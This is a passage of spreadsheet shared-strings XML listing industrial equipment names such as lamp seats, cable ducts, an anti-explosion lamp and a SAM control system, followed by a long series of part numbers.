    <t xml:space="preserve">LAMP SEAT  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">LAMP SEAT WELDING BLOCK </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANTI-EXPLOSION LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAM control system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.332.022</t>
  </si>
  <si>
    <t>DAAD799999</t>
  </si>
  <si>
    <t>DAAD700570</t>
  </si>
  <si>
    <t>107.328.807</t>
  </si>
  <si>
    <t>107.328.804</t>
  </si>
  <si>
    <t>107.328.797</t>
  </si>
  <si>
    <t>107.328.806</t>
  </si>
  <si>
    <t>107.392.449</t>
  </si>
  <si>
    <t>107.324.001</t>
  </si>
  <si>
    <t>107.109.308</t>
  </si>
  <si>
    <t>107.340.622</t>
  </si>
  <si>
    <t>DAAD015750</t>
  </si>
  <si>
    <t>107.016.548</t>
  </si>
  <si>
    <t>107.215.543</t>
  </si>
  <si>
    <t>107.331.417</t>
  </si>
  <si>
    <t>107.343.615</t>
  </si>
  <si>
    <t>107.426.585</t>
  </si>
  <si>
    <t>107.109.955</t>
  </si>
  <si>
    <t>107.377.938</t>
  </si>
  <si>
    <t>107.134.055</t>
  </si>
  <si>
    <t>107.329.990</t>
  </si>
  <si>
    <t>DAAD014674</t>
  </si>
  <si>
    <t>107.356.897</t>
  </si>
  <si>
    <t>107.356.898</t>
  </si>
  <si>
    <t>107.177.111</t>
  </si>
  <si>
    <t>107.335.002</t>
  </si>
  <si>
    <t>107.370.623</t>
  </si>
  <si>
    <t>107.353.573</t>
  </si>
  <si>
    <t>107.353.575</t>
  </si>
  <si>
    <t>DAAD018570</t>
  </si>
  <si>
    <t>107.292.539</t>
  </si>
  <si>
    <t>DAAD013662</t>
  </si>
  <si>
    <t>DAAD016517</t>
  </si>
  <si>
    <t>DAAD015762</t>
  </si>
  <si>
    <t>DAAD015760</t>
  </si>
  <si>
    <t>DAAD016479</t>
  </si>
  <si>
    <t>DAAD014660</t>
  </si>
  <si>
    <t>DAAD014277</t>
  </si>
  <si>
    <t>DAAD014343</t>
  </si>
  <si>
    <t>DAAD014223</t>
  </si>
  <si>
    <t>DAAD014317</t>
  </si>
  <si>
    <t>DAAD014238</t>
  </si>
  <si>
    <t>DAAD014240</t>
  </si>
  <si>
    <t>DAAD014181</t>
  </si>
  <si>
    <t>DAAD014214</t>
  </si>
  <si>
    <t>DAAD014441</t>
  </si>
  <si>
    <t>DAAD014402</t>
  </si>
  <si>
    <t>DAAD014908</t>
  </si>
  <si>
    <t>DAAD014431</t>
  </si>
  <si>
    <t>DAAD014520</t>
  </si>
  <si>
    <t>DAAD014572</t>
  </si>
  <si>
    <t>DAAD014594</t>
  </si>
  <si>
    <t>DAAD014613</t>
  </si>
  <si>
    <t>DAAD014235</t>
  </si>
  <si>
    <t>DAAD014232</t>
  </si>
  <si>
    <t>DAAD015472</t>
  </si>
  <si>
    <t>DAAD015495</t>
  </si>
  <si>
    <t>DAAD015549</t>
  </si>
  <si>
    <t>DAAD015579</t>
  </si>
  <si>
    <t>DAAD015604</t>
  </si>
  <si>
    <t>DAAD015615</t>
  </si>
  <si>
    <t>DAAD015621</t>
  </si>
  <si>
    <t>DAAD015629</t>
  </si>
  <si>
    <t>DAAD015650</t>
  </si>
  <si>
    <t>DAAD015657</t>
  </si>
  <si>
    <t>DAAD015676</t>
  </si>
  <si>
    <t>DAAD015677</t>
  </si>
  <si>
    <t>DAAD015683</t>
  </si>
  <si>
    <t>DAAD015689</t>
  </si>
  <si>
    <t>DAAD015694</t>
  </si>
  <si>
    <t>DAAD015698</t>
  </si>
  <si>
    <t>DAAD015745</t>
  </si>
  <si>
    <t>DAAD016265</t>
  </si>
  <si>
    <t>DAAD016291</t>
  </si>
  <si>
    <t>DAAD016348</t>
  </si>
  <si>
    <t>DAAD016412</t>
  </si>
  <si>
    <t>DAAD016422</t>
  </si>
  <si>
    <t>DAAD016430</t>
  </si>
  <si>
    <t>DAAD013574</t>
  </si>
  <si>
    <t>DAAD013923</t>
  </si>
  <si>
    <t>107.406.695</t>
  </si>
  <si>
    <t>DAAD016392</t>
  </si>
  <si>
    <t>DAAD018368</t>
  </si>
  <si>
    <t>DAAD015848</t>
  </si>
  <si>
    <t>DAAD016257</t>
  </si>
  <si>
    <t>107.315.750</t>
  </si>
  <si>
    <t>107.315.752</t>
  </si>
  <si>
    <t>107.216.253</t>
  </si>
  <si>
    <t>107.296.160</t>
  </si>
  <si>
    <t>DAAD010157</t>
  </si>
  <si>
    <t>W4810003</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>107.215.427</t>
  </si>
  <si>
    <t>DAAD011309</t>
  </si>
  <si>
    <t>W4810020</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.315.660</t>
  </si>
  <si>
    <t>107.114.200</t>
  </si>
  <si>
    <t>DAAD013798</t>
  </si>
  <si>
    <t>DAAD013799</t>
  </si>
  <si>
    <t>107.221.477</t>
  </si>
  <si>
    <t>DAAD012288</t>
  </si>
  <si>
    <t>107.221.657</t>
  </si>
  <si>
    <t>107.268.412</t>
  </si>
  <si>
    <t>107.426.233</t>
  </si>
  <si>
    <t>DAAD012013</t>
  </si>
  <si>
    <t>107.421.474</t>
  </si>
  <si>
    <t>107.407.456</t>
  </si>
  <si>
    <t>107.407.458</t>
  </si>
  <si>
    <t>107.414.062</t>
  </si>
  <si>
    <t>107.382.922</t>
  </si>
  <si>
    <t>107.420.176</t>
  </si>
  <si>
    <t>107.420.177</t>
  </si>
  <si>
    <t>107.421.705</t>
  </si>
  <si>
    <t>107.397.633</t>
  </si>
  <si>
    <t>017.053.700.111</t>
  </si>
  <si>
    <t>107.221.560.001</t>
  </si>
  <si>
    <t>PAAD024299</t>
  </si>
  <si>
    <t>015.201.012.210</t>
  </si>
  <si>
    <t>107.347.704.001</t>
  </si>
  <si>
    <t>107.348.540.001</t>
  </si>
  <si>
    <t>107.274.967.001</t>
  </si>
  <si>
    <t>107.221.674</t>
  </si>
  <si>
    <t>107.295.538</t>
  </si>
  <si>
    <t>107.221.667</t>
  </si>
  <si>
    <t>107.221.668</t>
  </si>
  <si>
    <t>DAAD013795</t>
  </si>
  <si>
    <t>107.427.816</t>
  </si>
  <si>
    <t>DAAD014180</t>
  </si>
  <si>
    <t>DAAD013796</t>
  </si>
  <si>
    <t>107.427.835</t>
  </si>
  <si>
    <t>107.412.204</t>
  </si>
  <si>
    <t>107.412.161</t>
  </si>
  <si>
    <t>107.400.645</t>
  </si>
  <si>
    <t>107.411.626</t>
  </si>
  <si>
    <t>DAAD009524</t>
  </si>
  <si>
    <t>DAAD014322</t>
  </si>
  <si>
    <t>DAAD014321</t>
  </si>
  <si>
    <t>107.221.391</t>
  </si>
  <si>
    <t>DAAD015017</t>
  </si>
  <si>
    <t>107.221.261</t>
  </si>
  <si>
    <t>107.338.979</t>
  </si>
  <si>
    <t>107.221.372</t>
  </si>
  <si>
    <t>DAAD012151</t>
  </si>
  <si>
    <t>DAAD012250</t>
  </si>
  <si>
    <t>107.221.426</t>
  </si>
  <si>
    <t>107.221.421</t>
  </si>
  <si>
    <t>DAAD011246</t>
  </si>
  <si>
    <t>107.318.839</t>
  </si>
  <si>
    <t>107.318.957</t>
  </si>
  <si>
    <t>107.221.232</t>
  </si>
  <si>
    <t>107.318.843</t>
  </si>
  <si>
    <t>107.221.420</t>
  </si>
  <si>
    <t>107.221.414</t>
  </si>
  <si>
    <t>107.425.695</t>
  </si>
  <si>
    <t>107.427.370</t>
  </si>
  <si>
    <t>107.343.070</t>
  </si>
  <si>
    <t>107.296.443</t>
  </si>
  <si>
    <t>107.221.797</t>
  </si>
  <si>
    <t>107.296.075</t>
  </si>
  <si>
    <t>107.295.029</t>
  </si>
  <si>
    <t>107.274.979</t>
  </si>
  <si>
    <t>DAAD022509</t>
  </si>
  <si>
    <t>107.340.772</t>
  </si>
  <si>
    <t>107.317.102</t>
  </si>
  <si>
    <t>107.221.533</t>
  </si>
  <si>
    <t>107.239.420</t>
  </si>
  <si>
    <t>107.221.525</t>
  </si>
  <si>
    <t>107.038.348</t>
  </si>
  <si>
    <t>107.428.272</t>
  </si>
  <si>
    <t>107.341.297</t>
  </si>
  <si>
    <t>107.341.443</t>
  </si>
  <si>
    <t>107.046.308</t>
  </si>
  <si>
    <t>107.413.428</t>
  </si>
  <si>
    <t>DAAD014051</t>
  </si>
  <si>
    <t>107.411.090</t>
  </si>
  <si>
    <t>107.221.271</t>
  </si>
  <si>
    <t>107.413.430</t>
  </si>
  <si>
    <t>107.270.445</t>
  </si>
  <si>
    <t>107.407.648</t>
  </si>
  <si>
    <t>107.221.248</t>
  </si>
  <si>
    <t>107.223.029</t>
  </si>
  <si>
    <t>107.218.159</t>
  </si>
  <si>
    <t>107.223.018</t>
  </si>
  <si>
    <t>107.317.867</t>
  </si>
  <si>
    <t>107.317.865</t>
  </si>
  <si>
    <t>107.012.086</t>
  </si>
  <si>
    <t>107.221.457</t>
  </si>
  <si>
    <t>107.221.589</t>
  </si>
  <si>
    <t>107.221.537</t>
  </si>
  <si>
    <t>107.421.422</t>
  </si>
  <si>
    <t>107.421.423</t>
  </si>
  <si>
    <t>107.315.745</t>
  </si>
  <si>
    <t>107.336.571</t>
  </si>
  <si>
    <t>107.270.619</t>
  </si>
  <si>
    <t>107.421.424</t>
  </si>
  <si>
    <t>107.274.991</t>
  </si>
  <si>
    <t>107.221.568</t>
  </si>
  <si>
    <t>107.295.526</t>
  </si>
  <si>
    <t>107.193.523</t>
  </si>
  <si>
    <t>107.312.873</t>
  </si>
  <si>
    <t>107.295.109</t>
  </si>
  <si>
    <t>DAAD015898</t>
  </si>
  <si>
    <t>DAAD015899</t>
  </si>
  <si>
    <t>107.109.091</t>
  </si>
  <si>
    <t>107.109.083</t>
  </si>
  <si>
    <t>107.109.077</t>
  </si>
  <si>
    <t>107.159.796</t>
  </si>
  <si>
    <t>107.238.866</t>
  </si>
  <si>
    <t>DAAD015113</t>
  </si>
  <si>
    <t>DAAD013035</t>
  </si>
  <si>
    <t>107.010.980</t>
  </si>
  <si>
    <t>107.221.243</t>
  </si>
  <si>
    <t>107.221.236</t>
  </si>
  <si>
    <t>107.012.025</t>
  </si>
  <si>
    <t>W4830004</t>
  </si>
  <si>
    <t>107.217.313</t>
  </si>
  <si>
    <t>107.221.290</t>
  </si>
  <si>
    <t>107.221.476</t>
  </si>
  <si>
    <t>107.221.383</t>
  </si>
  <si>
    <t>107.221.506</t>
  </si>
  <si>
    <t>107.134.302</t>
  </si>
  <si>
    <t>107.221.219</t>
  </si>
  <si>
    <t>107.221.215</t>
  </si>
  <si>
    <t>107.221.217</t>
  </si>
  <si>
    <t>107.221.223</t>
  </si>
  <si>
    <t>107.221.546</t>
  </si>
  <si>
    <t>107.221.502</t>
  </si>
  <si>
    <t>107.221.512</t>
  </si>
  <si>
    <t>107.221.523</t>
  </si>
  <si>
    <t>107.221.501</t>
  </si>
  <si>
    <t>107.221.522</t>
  </si>
  <si>
    <t>DAAD019600</t>
  </si>
  <si>
    <t>107.221.463</t>
  </si>
  <si>
    <t>107.221.461</t>
  </si>
  <si>
    <t>107.221.462</t>
  </si>
  <si>
    <t>107.221.479</t>
  </si>
  <si>
    <t>107.221.453</t>
  </si>
  <si>
    <t>DAAD015573</t>
  </si>
  <si>
    <t>DAAD015539</t>
  </si>
  <si>
    <t>DAAD015545</t>
  </si>
  <si>
    <t>107.343.923</t>
  </si>
  <si>
    <t>DAAD015219</t>
  </si>
  <si>
    <t>DAAD013865</t>
  </si>
  <si>
    <t>107.428.604</t>
  </si>
  <si>
    <t>107.346.453</t>
  </si>
  <si>
    <t>107.350.932</t>
  </si>
  <si>
    <t>107.340.893</t>
  </si>
  <si>
    <t>107.354.552</t>
  </si>
  <si>
    <t>107.038.645</t>
  </si>
  <si>
    <t>107.038.625</t>
  </si>
  <si>
    <t>107.038.837</t>
  </si>
  <si>
    <t>107.356.085</t>
  </si>
  <si>
    <t>107.338.498</t>
  </si>
  <si>
    <t>107.338.497</t>
  </si>
  <si>
    <t>DAAD009343</t>
  </si>
  <si>
    <t>DAAD009280</t>
  </si>
  <si>
    <t>DAAD013613</t>
  </si>
  <si>
    <t>DAAD013697</t>
  </si>
  <si>
    <t>107.284.755</t>
  </si>
  <si>
    <t>107.285.698</t>
  </si>
  <si>
    <t>107.326.721</t>
  </si>
  <si>
    <t>107.285.876</t>
  </si>
  <si>
    <t>DAAD015808</t>
  </si>
  <si>
    <t>107.177.724</t>
  </si>
  <si>
    <t>DAAD015813</t>
  </si>
  <si>
    <t>DAAD016289</t>
  </si>
  <si>
    <t>DAAD016638</t>
  </si>
  <si>
    <t>DAAD016484</t>
  </si>
  <si>
    <t>DAAD016705</t>
  </si>
  <si>
    <t>DAAD015503</t>
  </si>
  <si>
    <t>107.321.185</t>
  </si>
  <si>
    <t>107.413.439</t>
  </si>
  <si>
    <t>107.411.320</t>
  </si>
  <si>
    <t>107.411.322</t>
  </si>
  <si>
    <t>107.411.321</t>
  </si>
  <si>
    <t>107.411.381</t>
  </si>
  <si>
    <t>107.411.303</t>
  </si>
  <si>
    <t>107.420.780</t>
  </si>
  <si>
    <t>107.411.343</t>
  </si>
  <si>
    <t>107.411.336</t>
  </si>
  <si>
    <t>107.413.345</t>
  </si>
  <si>
    <t>107.413.356</t>
  </si>
  <si>
    <t>107.413.320</t>
  </si>
  <si>
    <t>107.413.544</t>
  </si>
  <si>
    <t>DAAD011713</t>
  </si>
  <si>
    <t>DAAD007772</t>
  </si>
  <si>
    <t>DAAD007830</t>
  </si>
  <si>
    <t>107.390.455</t>
  </si>
  <si>
    <t>107.362.058</t>
  </si>
  <si>
    <t>107.342.830</t>
  </si>
  <si>
    <t>DAAD040580</t>
  </si>
  <si>
    <t>DAAD011914</t>
  </si>
  <si>
    <t>DAAD039079</t>
  </si>
  <si>
    <t>DAAD012708</t>
  </si>
  <si>
    <t>107.352.752</t>
  </si>
  <si>
    <t>107.335.732</t>
  </si>
  <si>
    <t>107.376.687</t>
  </si>
  <si>
    <t>DAAD025655</t>
  </si>
  <si>
    <t>DAAD020656</t>
  </si>
  <si>
    <t>107.410.017</t>
  </si>
  <si>
    <t>107.221.714</t>
  </si>
  <si>
    <t>107.315.811</t>
  </si>
  <si>
    <t>107.364.929</t>
  </si>
  <si>
    <t>107.364.611</t>
  </si>
  <si>
    <t>107.410.339</t>
  </si>
  <si>
    <t>107.364.634</t>
  </si>
  <si>
    <t>DAAD012611</t>
  </si>
  <si>
    <t>107.315.847</t>
  </si>
  <si>
    <t>107.410.467</t>
  </si>
  <si>
    <t>107.410.524</t>
  </si>
  <si>
    <t>107.284.780</t>
  </si>
  <si>
    <t>107.363.929</t>
  </si>
  <si>
    <t>107.319.593</t>
  </si>
  <si>
    <t>107.280.320</t>
  </si>
  <si>
    <t>107.423.068</t>
  </si>
  <si>
    <t>107.364.583</t>
  </si>
  <si>
    <t>107.114.714</t>
  </si>
  <si>
    <t>107.114.697</t>
  </si>
  <si>
    <t>107.326.728</t>
  </si>
  <si>
    <t>107.424.212</t>
  </si>
  <si>
    <t>DAAD010928</t>
  </si>
  <si>
    <t>DAAD902101</t>
  </si>
  <si>
    <t>DAAD902102</t>
  </si>
  <si>
    <t>DAAD902094</t>
  </si>
  <si>
    <t>DAAD902103</t>
  </si>
  <si>
    <t>DAAD902105</t>
  </si>
  <si>
    <t>DAAD902124</t>
  </si>
  <si>
    <t>DAAD902151</t>
  </si>
  <si>
    <t>107.223.961</t>
  </si>
  <si>
    <t>DAAD902171</t>
  </si>
  <si>
    <t>DAAD902211</t>
  </si>
  <si>
    <t>DAAD902229</t>
  </si>
  <si>
    <t>DAAD016056</t>
  </si>
  <si>
    <t>DAAD902237</t>
  </si>
  <si>
    <t>107.361.220</t>
  </si>
  <si>
    <t>DAAD902246</t>
  </si>
  <si>
    <t>107.325.643</t>
  </si>
  <si>
    <t>DAAD017392</t>
  </si>
  <si>
    <t>107.114.832</t>
  </si>
  <si>
    <t>107.332.563</t>
  </si>
  <si>
    <t>DAAD027182</t>
  </si>
  <si>
    <t>DAAD012401</t>
  </si>
  <si>
    <t>DAAD012376</t>
  </si>
  <si>
    <t>DAAD012385</t>
  </si>
  <si>
    <t>107.361.969</t>
  </si>
  <si>
    <t>DAAD011105</t>
  </si>
  <si>
    <t>107.390.729</t>
  </si>
  <si>
    <t>107.364.273</t>
  </si>
  <si>
    <t>107.364.271</t>
  </si>
  <si>
    <t>107.363.973</t>
  </si>
  <si>
    <t>107.364.056</t>
  </si>
  <si>
    <t>107.363.971</t>
  </si>
  <si>
    <t>107.364.158</t>
  </si>
  <si>
    <t>107.424.061</t>
  </si>
  <si>
    <t>DAAD012644</t>
  </si>
  <si>
    <t>107.424.099</t>
  </si>
  <si>
    <t>107.284.604</t>
  </si>
  <si>
    <t>107.376.397</t>
  </si>
  <si>
    <t>107.288.679</t>
  </si>
  <si>
    <t>107.284.606</t>
  </si>
  <si>
    <t>107.424.629</t>
  </si>
  <si>
    <t>DAAD012585</t>
  </si>
  <si>
    <t>107.235.750</t>
  </si>
  <si>
    <t>107.235.733</t>
  </si>
  <si>
    <t>107.370.011</t>
  </si>
  <si>
    <t>107.370.083</t>
  </si>
  <si>
    <t>107.328.056</t>
  </si>
  <si>
    <t>107.313.195</t>
  </si>
  <si>
    <t>107.313.196</t>
  </si>
  <si>
    <t>107.313.198</t>
  </si>
  <si>
    <t>107.109.367</t>
  </si>
  <si>
    <t>107.311.910</t>
  </si>
  <si>
    <t>107.280.479</t>
  </si>
  <si>
    <t>107.280.478</t>
  </si>
  <si>
    <t>107.109.364</t>
  </si>
  <si>
    <t>107.331.493</t>
  </si>
  <si>
    <t>107.310.792</t>
  </si>
  <si>
    <t>107.311.174</t>
  </si>
  <si>
    <t>107.280.012</t>
  </si>
  <si>
    <t>107.313.142</t>
  </si>
  <si>
    <t>107.286.148</t>
  </si>
  <si>
    <t>DAAD015006</t>
  </si>
  <si>
    <t>107.364.834</t>
  </si>
  <si>
    <t>107.364.835</t>
  </si>
  <si>
    <t>107.364.837</t>
  </si>
  <si>
    <t>107.287.058</t>
  </si>
  <si>
    <t>107.364.839</t>
  </si>
  <si>
    <t>107.313.200</t>
  </si>
  <si>
    <t>107.425.753</t>
  </si>
  <si>
    <t>DAAD902050</t>
  </si>
  <si>
    <t>107.373.911</t>
  </si>
  <si>
    <t>107.373.915</t>
  </si>
  <si>
    <t>107.202.356</t>
  </si>
  <si>
    <t>DAAD902058</t>
  </si>
  <si>
    <t>DAAD901717</t>
  </si>
  <si>
    <t>DAAD901724</t>
  </si>
  <si>
    <t>DAAD901726</t>
  </si>
  <si>
    <t>DAAD015654</t>
  </si>
  <si>
    <t>107.358.308</t>
  </si>
  <si>
    <t>DAAD013905</t>
  </si>
  <si>
    <t>107.364.281</t>
  </si>
  <si>
    <t>107.364.283</t>
  </si>
  <si>
    <t>107.364.286</t>
  </si>
  <si>
    <t>107.423.884</t>
  </si>
  <si>
    <t>107.428.012</t>
  </si>
  <si>
    <t>DAAD013405</t>
  </si>
  <si>
    <t>DAAD014843</t>
  </si>
  <si>
    <t>DAAD014845</t>
  </si>
  <si>
    <t>DAAD013086</t>
  </si>
  <si>
    <t>107.360.808</t>
  </si>
  <si>
    <t>107.423.905</t>
  </si>
  <si>
    <t>107.427.746</t>
  </si>
  <si>
    <t>107.427.907</t>
  </si>
  <si>
    <t>107.427.905</t>
  </si>
  <si>
    <t>DAAD015282</t>
  </si>
  <si>
    <t>DAAD038618</t>
  </si>
  <si>
    <t>107.428.112</t>
  </si>
  <si>
    <t>107.428.123</t>
  </si>
  <si>
    <t>107.428.119</t>
  </si>
  <si>
    <t>DAAD014094</t>
  </si>
  <si>
    <t>DAAD014034</t>
  </si>
  <si>
    <t>DAAD901742</t>
  </si>
  <si>
    <t>DAAD900410</t>
  </si>
  <si>
    <t>DAAD012970</t>
  </si>
  <si>
    <t>DAAD012892</t>
  </si>
  <si>
    <t>107.223.262</t>
  </si>
  <si>
    <t>107.426.966</t>
  </si>
  <si>
    <t>107.426.964</t>
  </si>
  <si>
    <t>DAAD014814</t>
  </si>
  <si>
    <t>107.312.286</t>
  </si>
  <si>
    <t>107.424.103</t>
  </si>
  <si>
    <t>107.427.611</t>
  </si>
  <si>
    <t>107.424.104</t>
  </si>
  <si>
    <t>107.311.607</t>
  </si>
  <si>
    <t>107.311.554</t>
  </si>
  <si>
    <t>107.311.601</t>
  </si>
  <si>
    <t>107.427.614</t>
  </si>
  <si>
    <t>DAAD012327</t>
  </si>
  <si>
    <t>107.424.102</t>
  </si>
  <si>
    <t>107.424.101</t>
  </si>
  <si>
    <t>107.427.928</t>
  </si>
  <si>
    <t>DAAD013609</t>
  </si>
  <si>
    <t>DAAD013570</t>
  </si>
  <si>
    <t>DAAD013641</t>
  </si>
  <si>
    <t>DAAD901764</t>
  </si>
  <si>
    <t>DAAD013970</t>
  </si>
  <si>
    <t>DAAD013997</t>
  </si>
  <si>
    <t>DAAD015781</t>
  </si>
  <si>
    <t>DAAD016998</t>
  </si>
  <si>
    <t>107.284.147</t>
  </si>
  <si>
    <t>DAAD016837</t>
  </si>
  <si>
    <t>DAAD017092</t>
  </si>
  <si>
    <t>107.331.093</t>
  </si>
  <si>
    <t>107.281.638</t>
  </si>
  <si>
    <t>DAAD017126</t>
  </si>
  <si>
    <t>107.409.986</t>
  </si>
  <si>
    <t>DAAD016237</t>
  </si>
  <si>
    <t>107.094.303</t>
  </si>
  <si>
    <t>107.299.071</t>
  </si>
  <si>
    <t>107.297.879</t>
  </si>
  <si>
    <t>107.409.738</t>
  </si>
  <si>
    <t>107.313.101</t>
  </si>
  <si>
    <t>107.223.517</t>
  </si>
  <si>
    <t>107.428.629</t>
  </si>
  <si>
    <t>107.428.633</t>
  </si>
  <si>
    <t>DAAD014648</t>
  </si>
  <si>
    <t>107.268.233</t>
  </si>
  <si>
    <t>107.268.232</t>
  </si>
  <si>
    <t>107.330.967</t>
  </si>
  <si>
    <t>107.428.631</t>
  </si>
  <si>
    <t>DAAD017366</t>
  </si>
  <si>
    <t>DAAD016178</t>
  </si>
  <si>
    <t>107.262.584</t>
  </si>
  <si>
    <t>DAAD016734</t>
  </si>
  <si>
    <t>107.383.765</t>
  </si>
  <si>
    <t>DAAD016599</t>
  </si>
  <si>
    <t>DAAD016686</t>
  </si>
  <si>
    <t>DAAD016861</t>
  </si>
  <si>
    <t>DAAD017116</t>
  </si>
  <si>
    <t>107.125.152</t>
  </si>
  <si>
    <t>107.296.668</t>
  </si>
  <si>
    <t>DAAD017542</t>
  </si>
  <si>
    <t>DAAD017577</t>
  </si>
  <si>
    <t>DAAD018128</t>
  </si>
  <si>
    <t>DAAD017762</t>
  </si>
  <si>
    <t>DAAD016913</t>
  </si>
  <si>
    <t>DAAD016894</t>
  </si>
  <si>
    <t>107.296.675</t>
  </si>
  <si>
    <t>107.296.684</t>
  </si>
  <si>
    <t>107.315.617</t>
  </si>
  <si>
    <t>DAAD017647</t>
  </si>
  <si>
    <t>DAAD017599</t>
  </si>
  <si>
    <t>DAAD017944</t>
  </si>
  <si>
    <t>DAAD017708</t>
  </si>
  <si>
    <t>107.298.220</t>
  </si>
  <si>
    <t>107.236.347</t>
  </si>
  <si>
    <t>107.223.810</t>
  </si>
  <si>
    <t>107.298.264</t>
  </si>
  <si>
    <t>107.359.694</t>
  </si>
  <si>
    <t>107.298.219</t>
  </si>
  <si>
    <t>DAAD015398</t>
  </si>
  <si>
    <t>DAAD015399</t>
  </si>
  <si>
    <t>107.048.724</t>
  </si>
  <si>
    <t>107.074.558</t>
  </si>
  <si>
    <t>107.144.892</t>
  </si>
  <si>
    <t>107.298.499</t>
  </si>
  <si>
    <t>107.223.312</t>
  </si>
  <si>
    <t>107.386.229</t>
  </si>
  <si>
    <t>DAAD009117</t>
  </si>
  <si>
    <t>DAAD017100</t>
  </si>
  <si>
    <t>DAAD017737</t>
  </si>
  <si>
    <t>DAAD016152</t>
  </si>
  <si>
    <t>DAAD025448</t>
  </si>
  <si>
    <t>DAAD025449</t>
  </si>
  <si>
    <t>DAAD024792</t>
  </si>
  <si>
    <t>107.223.432</t>
  </si>
  <si>
    <t>107.074.604</t>
  </si>
  <si>
    <t>DAAD017157</t>
  </si>
  <si>
    <t>DAAD014169</t>
  </si>
  <si>
    <t>107.316.414</t>
  </si>
  <si>
    <t>107.316.566</t>
  </si>
  <si>
    <t>107.316.567</t>
  </si>
  <si>
    <t>107.011.433</t>
  </si>
  <si>
    <t>107.011.435</t>
  </si>
  <si>
    <t>107.317.800</t>
  </si>
  <si>
    <t>107.317.198</t>
  </si>
  <si>
    <t>107.348.306</t>
  </si>
  <si>
    <t>107.074.645</t>
  </si>
  <si>
    <t>107.017.066</t>
  </si>
  <si>
    <t>DAAD014205</t>
  </si>
  <si>
    <t>DAAD014119</t>
  </si>
  <si>
    <t>107.316.269</t>
  </si>
  <si>
    <t>DAAD010012</t>
  </si>
  <si>
    <t>107.315.731</t>
  </si>
  <si>
    <t>107.297.638</t>
  </si>
  <si>
    <t>107.297.636</t>
  </si>
  <si>
    <t>107.223.750</t>
  </si>
  <si>
    <t>107.223.717</t>
  </si>
  <si>
    <t>107.223.414</t>
  </si>
  <si>
    <t>107.223.411</t>
  </si>
  <si>
    <t>107.223.392</t>
  </si>
  <si>
    <t>DAAD010133</t>
  </si>
  <si>
    <t>107.223.209</t>
  </si>
  <si>
    <t>107.223.191</t>
  </si>
  <si>
    <t>107.223.208</t>
  </si>
  <si>
    <t>107.196.814</t>
  </si>
  <si>
    <t>107.012.055</t>
  </si>
  <si>
    <t>107.318.769</t>
  </si>
  <si>
    <t>107.223.056</t>
  </si>
  <si>
    <t>107.012.056</t>
  </si>
  <si>
    <t>107.387.029.200</t>
  </si>
  <si>
    <t>107.376.783.203</t>
  </si>
  <si>
    <t>107.272.513.200</t>
  </si>
  <si>
    <t>017.024.008.063</t>
  </si>
  <si>
    <t>107.272.582.200</t>
  </si>
  <si>
    <t>107.272.583.001</t>
  </si>
  <si>
    <t>015.251.433.161</t>
  </si>
  <si>
    <t>015.251.724.031</t>
  </si>
  <si>
    <t>107.272.517.001</t>
  </si>
  <si>
    <t>107.272.569.001</t>
  </si>
  <si>
    <t>107.201.614.001</t>
  </si>
  <si>
    <t>107.201.613.001</t>
  </si>
  <si>
    <t>107.201.624.001</t>
  </si>
  <si>
    <t>015.201.301.910</t>
  </si>
  <si>
    <t>015.509.013.163</t>
  </si>
  <si>
    <t>015.151.034.161</t>
  </si>
  <si>
    <t>107.201.615.200</t>
  </si>
  <si>
    <t>107.201.616.001</t>
  </si>
  <si>
    <t>107.201.668.200</t>
  </si>
  <si>
    <t>107.201.668.002</t>
  </si>
  <si>
    <t>107.201.668.004</t>
  </si>
  <si>
    <t>107.201.616.002</t>
  </si>
  <si>
    <t>107.201.665.001</t>
  </si>
  <si>
    <t>107.201.749.001</t>
  </si>
  <si>
    <t>017.722.562.024</t>
  </si>
  <si>
    <t>107.272.648.001</t>
  </si>
  <si>
    <t>015.505.510.410</t>
  </si>
  <si>
    <t>107.336.029</t>
  </si>
  <si>
    <t>107.223.268</t>
  </si>
  <si>
    <t>107.336.031</t>
  </si>
  <si>
    <t>DAAD015790</t>
  </si>
  <si>
    <t>DAAD015782</t>
  </si>
  <si>
    <t>107.223.805</t>
  </si>
  <si>
    <t>107.223.804</t>
  </si>
  <si>
    <t>107.223.799</t>
  </si>
  <si>
    <t>107.223.803</t>
  </si>
  <si>
    <t>107.223.755</t>
  </si>
  <si>
    <t>DAAD015580</t>
  </si>
  <si>
    <t>DAAD015578</t>
  </si>
  <si>
    <t>107.399.093</t>
  </si>
  <si>
    <t>107.316.207</t>
  </si>
  <si>
    <t>107.316.086</t>
  </si>
  <si>
    <t>107.012.033</t>
  </si>
  <si>
    <t>107.223.742</t>
  </si>
  <si>
    <t>107.223.520</t>
  </si>
  <si>
    <t>107.223.511</t>
  </si>
  <si>
    <t>107.223.512</t>
  </si>
  <si>
    <t>107.223.513</t>
  </si>
  <si>
    <t>107.223.473</t>
  </si>
  <si>
    <t>107.427.686</t>
  </si>
  <si>
    <t>107.426.823</t>
  </si>
  <si>
    <t>W4890013-200</t>
  </si>
  <si>
    <t>W4890010-200</t>
  </si>
  <si>
    <t>W4890007-200</t>
  </si>
  <si>
    <t>107.337.506</t>
  </si>
  <si>
    <t>107.315.919</t>
  </si>
  <si>
    <t>107.315.920</t>
  </si>
  <si>
    <t>107.223.479</t>
  </si>
  <si>
    <t>107.223.489</t>
  </si>
  <si>
    <t>DAAD017374</t>
  </si>
  <si>
    <t>107.223.095</t>
  </si>
  <si>
    <t>DAAD016682</t>
  </si>
  <si>
    <t>107.223.368</t>
  </si>
  <si>
    <t>107.316.699</t>
  </si>
  <si>
    <t>DAAD017510</t>
  </si>
  <si>
    <t>DAAD017193</t>
  </si>
  <si>
    <t>DAAD017432</t>
  </si>
  <si>
    <t>DAAD017449</t>
  </si>
  <si>
    <t>DAAD017440</t>
  </si>
  <si>
    <t>DAAD017434</t>
  </si>
  <si>
    <t>107.223.751</t>
  </si>
  <si>
    <t>DAAD017061</t>
  </si>
  <si>
    <t>DAAD017057</t>
  </si>
  <si>
    <t>DAAD014221</t>
  </si>
  <si>
    <t>DAAD014217</t>
  </si>
  <si>
    <t>DAAD017480</t>
  </si>
  <si>
    <t>DAAD017424</t>
